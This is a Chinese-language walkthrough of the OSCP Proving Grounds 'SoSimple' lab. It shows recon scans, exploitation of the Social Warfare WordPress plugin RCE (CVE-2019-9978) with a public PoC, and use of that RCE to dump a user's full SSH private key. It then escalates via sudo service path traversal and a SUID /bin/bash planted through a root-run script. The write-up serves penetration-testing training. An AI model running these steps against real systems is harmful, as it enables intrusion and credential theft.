OSCP - Proving Grounds- SoSimple

主要知识点

wordpress 插件RCE漏洞
sudo -l + shell劫持

具体步骤

依旧是nmap 起手，只发现了22和80端口，但80端口只能看到一张图

Nmap scan report for 192.168.214.78
Host is up (0.46s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
|   256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_  256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple

针对80端口进行路径爆破发现有一个WordPress路径

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.214.78
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.214.78/wordpress/]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================

于是我们使用wpscan进行扫描，我这边挂了代理，并且我希望使用更有侵略性的插件扫描，所以命令如下

wpscan --api-token xxxxxx--proxy socks5://127.0.0.1:7890 -e --plugins-detection aggressive  --url http://192.168.214.78/wordpress 
......
......

[+] social-warfare
 | Location: http://192.168.214.78/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2024-09-17T20:18:00.000Z
 | Readme: http://192.168.214.78/wordpress/wp-content/plugins/social-warfare/readme.txt
 | [!] The version is out of date, the latest version is 4.5.4
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.214.78/wordpress/wp-content/plugins/social-warfare/, status: 200
 |
 | [!] 7 vulnerabilities identified:
 |
 |......
 |......
 |......
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
 |      - https://www.webarxsecurity.com/social-warfare-vulnerability/

发现了social warefare版本有RCE漏洞，所以查询一下，得到了好多个poc，不过下面这个比较好用GitHub - grimlockx/CVE-2019-9978: Remote Code Execution in Social Warfare Plugin before 3.5.3 for Wordpress.

C:\home\kali\Documents\OFFSEC\play\SoSimple\CVE-2019-9978-main> python CVE-2019-9978.py -t http://192.168.214.78/wordpress -l 192.168.45.241 -p 80 -c "id"    
[+] Started HTTP server on port 80
[+] Payload created successfully
[+] Target seems vulnerable
[+] Exploiting...

uid=33(www-data) gid=33(www-data) groups=33(www-data)

按照同样的套路，我们发现了/home/max目录中的.ssh路径下有key文件，所以复制下来尝试ssh登录

C:\home\kali\Documents\OFFSEC\play\SoSimple\CVE-2019-9978-main> python CVE-2019-9978.py -t http://192.168.214.78/wordpress -l 192.168.45.241 -p 80 -c "cat /home/max/.ssh/id_rsa"    
[+] Started HTTP server on port 80
[+] Payload created successfully
[+] Target seems vulnerable
[+] Exploiting...

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAx231yVBZBsJXe/VOtPEjNCQXoK+p5HsA74EJR7QoI+bsuarBd4Cd
mnckYREKpbjS4LLmN7awDGa8rbAuYq8JcXPdOOZ4bjMknONbcfc+u/6OHwcvu6mhiW/zdS
DKJxxH+OhVhblmgqHnY4U19ZfyL3/sIpvpQ1SVhwBHDkWPO4AJpwhoL4J8AbqtS526LBdL
KhhC+tThhG5d7PfUZMzMqyvWQ+L53aXRL1MaFYNcahgzzk0xt2CJsCWDkAlacuxtXoQHp9
SrMYTW6P+CMEoyQ3wkVRRF7oN7x4mBD8zdSM1wc3UilRN1sep20AdE9PE3KHsImrcMGXI3
D1ajf9C3exrIMSycv9Xo6xiHlzKUoVcrFadoHnyLI4UgWeM23YDTP1Z05KIJrovIzUtjuN
pHSQIL0SxEF/hOudjJLxXxDDv/ExXDEXZgK5J2d24RwZg9kYuafDFhRLYXpFYekBr0D7z/
qE5QtjS14+6JgQS9he3ZIZHucayi2B5IQoKGsgGzAAAFiMF1atXBdWrVAAAAB3NzaC1yc2
EAAAGBAMdt9clQWQbCV3v1TrTxIzQkF6CvqeR7AO+BCUe0KCPm7LmqwXeAnZp3JGERCqW4
0uCy5je2sAxmvK2wLmKvCXFz3TjmeG4zJJzjW3H3Prv+jh8HL7upoYlv83UgyiccR/joVY
W5ZoKh52OFNfWX8i9/7CKb6UNUlYcARw5FjzuACacIaC+CfAG6rUuduiwXSyoYQvrU4YRu
Xez31GTMzKsr1kPi+d2l0S9TGhWDXGoYM85NMbdgibAlg5AJWnLsbV6EB6fUqzGE1uj/gj
BKMkN8JFUURe6De8eJgQ/M3UjNcHN1IpUTdbHqdtAHRPTxNyh7CJq3DBlyNw9Wo3/Qt3sa
yDEsnL/V6OsYh5cylKFXKxWnaB58iyOFIFnjNt2A0z9WdOSiCa6LyM1LY7jaR0kCC9EsRB
f4TrnYyS8V8Qw7/xMVwxF2YCuSdnduEcGYPZGLmnwxYUS2F6RWHpAa9A+8/6hOULY0tePu
iYEEvYXt2SGR7nGsotgeSEKChrIBswAAAAMBAAEAAAGBAJ6Z/JaVp7eQZzLV7DpKa8zTx1
arXVmv2RagcFjuFd43kJw4CJSZXL2zcuMfQnB5hHveyugUCf5S1krrinhA7CmmE5Fk+PHr
Cnsa9Wa1Utb/otdaR8PfK/C5b8z+vsZL35E8dIdc4wGQ8QxcrIUcyiasfYcop2I8qo4q0l
evSjHvqb2FGhZul2BordktHxphjA12Lg59rrw7acdDcU6Y8UxQGJ70q/JyJOKWHHBvf9eA
V/MBwUAtLlNAAllSlvQ+wXKunTBxwHDZ3ia3a5TCAFNhS3p0WnWcbvVBgnNgkGp/Z/Kvob
Jcdi1nKfi0w0/oFzpQA9a8gCPw9abUnAYKaKCFlW4h1Ke21F0qAeBnaGuyVjL+Qedp6kPF
zORHt816j+9lMfqDsJjpsR1a0kqtWJX8O6fZfgFLxSGPlB9I6hc/kPOBD+PVTmhIsa4+CN
f6D3m4Z15YJ9TEodSIuY47OiCRXqRItQkUMGGsdTf4c8snpor6fPbzkEPoolrj+Ua1wQAA
AMBxfIybC03A0M9v1jFZSCysk5CcJwR7s3yq/0UqrzwS5lLxbXgEjE6It9QnKavJ0UEFWq
g8RMNip75Rlg+AAoTH2DX0QQXhQ5tV2j0NZeQydoV7Z3dMgwWY+vFwJT4jf1V1yvw2kuNQ
N3YS+1sxvxMWxWh28K+UtkbfaQbtyVBcrNS5UkIyiDx/OEGIq5QHGiNBvnd5gZCjdazueh
cQaj26Nmy8JCcnjiqKlJWXoleCdGZ48PdQfpNUbs5UkXTCIV8AAADBAPtx1p6+LgxGfH7n
NsJZXSWKys4XVLOFcQK/GnheAr36bAyCPk4wR+q7CrdrHwn0L22vgx2Bb9LhMsM9FzpUAk
AiXAOSwqA8FqZuGIzmYBV1YUm9TLI/b01tCrO2+prFxbbqxjq9X3gmRTu+Vyuz1mR+/Bpn
+q8Xakx9+xgFOnVxhZ1fxCFQO1FoGOdfhgyDF1IekET9zrnbs/MmpUHpA7LpvnOTMwMXxh
LaFugPsoLF3ZZcNc6pLzS2h3D5YOFyfwAAAMEAywriLVyBnLmfh5PIwbAhM/B9qMgbbCeN
pgVr82fDG6mg8FycM7iU4E6f7OvbFE8UhxaA28nLHKJqiobZgqLeb2/EsGoEg5Y5v7P8pM
uNiCzAdSu+RLC0CHf1YOoLWn3smE86CmkcBkAOjk89zIh2nPkrv++thFYTFQnAxmjNsWyP
m0Qa+EvvCAajPHDTCR46n2vvMANUFIRhwtDdCeDzzURs1XJCMeiXD+0ovg/mzg2bp1bYp3
2KtNjtorSgKa7NAAAADnJvb3RAc28tc2ltcGxlAQIDBA==
-----END OPENSSH PRIVATE KEY-----

将上面的key文件写入到本地的id_rsa中，并赋予600权限，并尝试ssh登录成功

C:\home\kali\Documents\OFFSEC\play\SoSimple> chmod 600 id_rsa 
                                                                                                                                                                                                                                            
C:\home\kali\Documents\OFFSEC\play\SoSimple> ssh max@192.168.214.78 -i id_rsa
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
......
......
max@so-simple:~$ whoami
max

先执行sudo -l 发现可以以steven的身份执行 /usr/sbin/service

max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User max may run the following commands on so-simple:
    (steven) NOPASSWD: /usr/sbin/service

参考GTFObins的方法，可以转变为steven用户

max@so-simple:~$ sudo -u steven /usr/sbin/service  ../../bin/bash
steven@so-simple:/$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)

继续以steven的用户身份进行sudo -l，发现可以以root用户身份执行/opt/tools/server-health.sh

steven@so-simple:/$ sudo -l
Matching Defaults entries for steven on so-simple:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User steven may run the following commands on so-simple:
    (root) NOPASSWD: /opt/tools/server-health.sh

但其实并无该文件，所以我们尝试创建一个,其内容为赋予/bin/bash SUID，再以Root身份执行，提权成功

steven@so-simple:/$ cat /opt/tools/server-health.sh
cat: /opt/tools/server-health.sh: No such file or directory
steven@so-simple:/$ ls -l /opt/tools
ls: cannot access '/opt/tools': No such file or directory
steven@so-simple:/$ ls -l /opt
total 0
steven@so-simple:/$ mkdir /opt/tools
steven@so-simple:/$ cd /opt/tools
steven@so-simple:/opt/tools$ 
steven@so-simple:/opt/tools$ echo "chmod +s /bin/bash" > server-health.sh
steven@so-simple:/opt/tools$ chmod +x server-health.sh 
steven@so-simple:/opt/tools$ sudo -u root /opt/tools/server-health.sh
steven@so-simple:/opt/tools$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1183448 Feb 25  2020 /bin/bash
steven@so-simple:/opt/tools$ /bin/bash -p 
bash-5.0# cat /root/proof.txt
5d53bb7f654bb7d09e8fbfa50a392267
bash-5.0#